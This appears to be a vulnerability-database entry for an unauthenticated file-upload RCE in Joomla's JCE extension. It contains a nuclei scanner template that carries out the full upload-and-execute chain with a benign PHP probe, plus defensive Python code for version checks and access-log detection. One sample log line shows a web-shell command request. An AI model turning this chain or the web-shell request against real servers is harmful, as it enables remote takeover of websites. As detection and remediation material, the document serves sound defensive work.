Joomla! JCE extension < 2.9.99.5 unauthenticated RCE

01 Jul 2026 03:36:47 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Joomla JCE extension below 2.9.99.5 allows unauthenticated remote code execution via file upload.
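The version threshold in the title is the first thing to check on an inventory. The following is an added example, not part of the Vulners entry or the nuclei template: it reads the version from a JCE component manifest (Joomla extension manifests carry a top-level <version> element) and compares it with 2.9.99.5 numerically rather than as a string, so that 2.9.99 sorts below 2.9.99.5 and 2.10.0 above it. The manifest path administrator/components/com_jce/jce.xml and the sample manifest are assumptions made for the example.

```python
import re
import xml.etree.ElementTree as ET

# First release the page names as not affected ("< 2.9.99.5" is vulnerable).
FIXED_VERSION = "2.9.99.5"

# Assumed location of the JCE component manifest inside a Joomla install
# (assumption for this example; adjust to the deployment).
MANIFEST_PATH = "administrator/components/com_jce/jce.xml"


def parse_version(version):
    """Turn '2.9.99.5' into (2, 9, 99, 5) so versions compare numerically.

    Trailing non-numeric suffixes ('2.9.99.5-rc1') are dropped. Tuple
    comparison gives (2, 9, 99) < (2, 9, 99, 5) and (2, 10, 0) > (2, 9, 99, 5),
    both of which a plain string comparison gets wrong.
    """
    m = re.match(r"\d+(?:\.\d+)*", version.strip())
    if not m:
        raise ValueError(f"unparseable version string: {version!r}")
    return tuple(int(part) for part in m.group(0).split("."))


def manifest_version(manifest_xml):
    """Read the top-level <version> element of a Joomla extension manifest."""
    root = ET.fromstring(manifest_xml)
    elem = root.find("version")
    if elem is None or not (elem.text or "").strip():
        raise ValueError("manifest has no <version> element")
    return elem.text.strip()


def is_vulnerable(installed, fixed=FIXED_VERSION):
    """True when the installed version sorts below the first fixed release."""
    return parse_version(installed) < parse_version(fixed)


def check_manifest(manifest_xml):
    """Return a small report for one manifest string."""
    installed = manifest_version(manifest_xml)
    return {
        "installed": installed,
        "fixed": FIXED_VERSION,
        "vulnerable": is_vulnerable(installed),
    }


# Constructed sample manifest carrying only the fields this check relies on.
SAMPLE_MANIFEST = """<extension type="component" version="4.0" method="upgrade">
  <name>COM_JCE</name>
  <version>2.9.98</version>
  <description>COM_JCE_DESC</description>
</extension>
"""

if __name__ == "__main__":
    print(check_manifest(SAMPLE_MANIFEST))
    # On a real install: check_manifest(open(MANIFEST_PATH).read())
```

Run it against the manifest of each Joomla site in scope; a "vulnerable": True result means the site is below the fixed release regardless of whether the unauthenticated import endpoint happens to be reachable through a WAF.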

Related

Reporter       Title                                                            Published          Family
GithubExploit  Exploit for CVE-2026-48907                                       9 Jun 2026 16:30   githubexploit
GithubExploit  COM_JCE_VANDA                                                    29 Jun 2026 11:00  githubexploit
GithubExploit  Exploit for Improper Access Control in Widgetfactorylimited Jce  22 Jun 2026 18:31  githubexploit
GithubExploit  Exploit for CVE-2026-48907                                       11 Jun 2026 13:14  githubexploit
GithubExploit  Exploit for Improper Access Control in Widgetfactorylimited Jce  29 Jun 2026 06:36  githubexploit
GithubExploit  Exploit for CVE-2026-48907                                       12 Jun 2026 09:22  githubexploit
GithubExploit  Exploit for Improper Access Control in Widgetfactorylimited Jce  27 Jun 2026 04:48  githubexploit
GithubExploit  Exploit for Improper Access Control in Widgetfactorylimited Jce  29 Jun 2026 21:14  githubexploit
GithubExploit  Exploit for Improper Access Control in Widgetfactorylimited Jce  1 Jul 2026 14:05   githubexploit
GithubExploit  JoomlaSniper                                                     12 Jun 2026 08:12  githubexploit

id: CVE-2026-48907
info:
  name: Joomla! JCE extension < 2.9.99.5 unauthenticated RCE
  author: ywh-jfellus
  severity: critical
  description: |
    Joomla JCE editor extension contains an unrestricted file upload vulnerability: unauthenticated users are allowed to import new editor profiles, and the uploaded profile file is stored under the site's /tmp/ directory with the attacker-supplied filename, letting attackers upload and execute PHP code remotely without any authentication.
  impact: |
    Unauthenticated attackers can upload and execute arbitrary PHP code, leading to full remote code execution on the server.
  remediation: |
    Update to the latest version of the JCE editor extension.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-48907
    - https://github.com/advisories/GHSA-c3f5-4g7f-qjqj
    - https://www.joomlacontenteditor.net/support/changelog/editor
    - https://github.com/ywh-jfellus/CVE-2026-48907
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8  # computed from the vector above (S:U); 10.0 would require S:C
    cve-id: CVE-2026-48907
    epss-score: 0.80425
    epss-percentile: 0.99572
    cwe-id: CWE-284
  metadata:
    verified: true
    max-request: 3
    vendor: joomlacontenteditor
    product: jce
    shodan-query: http.component:"Joomla"
    fofa-query: app="Joomla"
  tags: cve,cve2026,joomla,jce,rce,unauth,intrusive,vkev,kev

variables:
  payload: "<?= 45*69 ?>"
  tmp_file: "{{'nuclei-' + md5(Hostname + 'phuJ4OoP')}}.xml.php"

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - 'contains(body, "Joomla")'
          - 'contains(body, "csrf.token")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: csrf_token
        part: body
        group: 1
        internal: true
        regex:
          - '"csrf\.token"\s*:\s*"([a-f0-9]{32})"'

  - raw:
      - |
        POST /index.php?option=com_jce HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=66dea244639dd05378afdad58c2c9c1d

        --66dea244639dd05378afdad58c2c9c1d
        Content-Disposition: form-data; name="task"

        profiles.import
        --66dea244639dd05378afdad58c2c9c1d
        Content-Disposition: form-data; name="{{csrf_token}}"

        1
        --66dea244639dd05378afdad58c2c9c1d
        Content-Disposition: form-data; name="profile_file"; filename="{{tmp_file}}"
        Content-Type: application/xml

        {{payload}}
        --66dea244639dd05378afdad58c2c9c1d--

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - 'contains(body, "success")'
        condition: and
        internal: true

  - raw:
      - |
        GET /tmp/{{tmp_file}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "3105"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220467e4c4ec5674bb9f5f6bd56c1ec010592b38241ce10b5c2e092aa4a0ce7dab5022100ea3af7bc676cffaaf16fe493078b68750143d3477c38e1bd737bf7002d3f0ab8:922c64590222798bb761d5b6d8e72950
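The template's three requests leave a recognisable trace in web-server access logs: a POST to /index.php?option=com_jce followed, from the same client, by a GET for a .php file under /tmp/. The third step only succeeds where Joomla's tmp directory sits inside the web root and the server executes PHP there, so moving tmp_path out of the web root or disabling PHP execution under /tmp/ defeats this specific chain even before the extension is updated. The task=profiles.import parameter travels in the multipart body and does not appear in a standard access log, so the correlation has to key on the URL alone. The following is an added example, not part of the Vulners entry or the nuclei template: a Python detector over Apache/nginx combined-format lines that flags any GET of a PHP-family file under /tmp/ and escalates the verdict when the same IP posted to com_jce within the preceding ten minutes. The log lines, IP addresses and the ten-minute window are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" access-log format; only the fields used here are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# A PHP-family file requested directly under Joomla's /tmp/ directory.
TMP_PHP_RE = re.compile(r"^/tmp/[^/]+\.(?:php\d?|phtml)$", re.IGNORECASE)
# Correlation window between the com_jce POST and the /tmp/ GET (assumption).
WINDOW = timedelta(minutes=10)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": url.path,
        "query": parse_qs(url.query),
        "status": int(m["status"]),
    }


def is_jce_post(rec):
    """Step 2 of the template as seen in an access log: POST /index.php?option=com_jce."""
    return (rec["method"] == "POST"
            and rec["path"].endswith("/index.php")
            and rec["query"].get("option") == ["com_jce"])


def find_jce_upload_chains(lines, window=WINDOW):
    """Flag GETs of PHP files under /tmp/; escalate when the same IP hit com_jce first."""
    recs = [r for r in (parse_line(l) for l in lines) if r]
    recs.sort(key=lambda r: r["ts"])
    jce_posts = defaultdict(list)   # ip -> timestamps of com_jce POSTs seen so far
    findings = []
    for r in recs:
        if is_jce_post(r):
            jce_posts[r["ip"]].append(r["ts"])
            continue
        if r["method"] == "GET" and TMP_PHP_RE.match(r["path"]):
            recent = [t for t in jce_posts[r["ip"]] if r["ts"] - t <= window]
            findings.append({
                "ip": r["ip"],
                "ts": r["ts"].isoformat(),
                "path": r["path"],
                "status": r["status"],
                "verdict": "jce_upload_chain" if recent else "php_in_tmp",
            })
    return findings


# Constructed sample log: one template-shaped chain, one unrelated PHP probe
# under /tmp/, and benign traffic that must not be flagged.
SAMPLE_LOG = """\
203.0.113.10 - - [11/Jun/2026:15:40:01 +0000] "GET / HTTP/1.1" 200 51234
203.0.113.10 - - [11/Jun/2026:15:40:02 +0000] "POST /index.php?option=com_jce HTTP/1.1" 200 87
203.0.113.10 - - [11/Jun/2026:15:40:03 +0000] "GET /tmp/nuclei-0a1b2c3d4e5f60718293a4b5c6d7e8f9.xml.php HTTP/1.1" 200 4
198.51.100.7 - - [11/Jun/2026:15:41:10 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 20345
198.51.100.7 - - [11/Jun/2026:15:41:12 +0000] "GET /tmp/notes.xml HTTP/1.1" 404 196
192.0.2.55 - - [11/Jun/2026:16:02:00 +0000] "GET /tmp/shell.php?cmd=id HTTP/1.1" 200 120
"""

if __name__ == "__main__":
    for finding in find_jce_upload_chains(SAMPLE_LOG.splitlines()):
        print(finding)
```

A 200 on the /tmp/ GET is the confirmation the template itself waits for; a 403 or 404 on the same path still records that someone tried the chain, which is why the detector keeps the status rather than filtering on it.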

11 Jun 2026 15:38 (current)
Vulners AI Score: 7.7 (High risk)
CVSS 3.1: 9.8
CVSS 4: 10
EPSS: 0.80425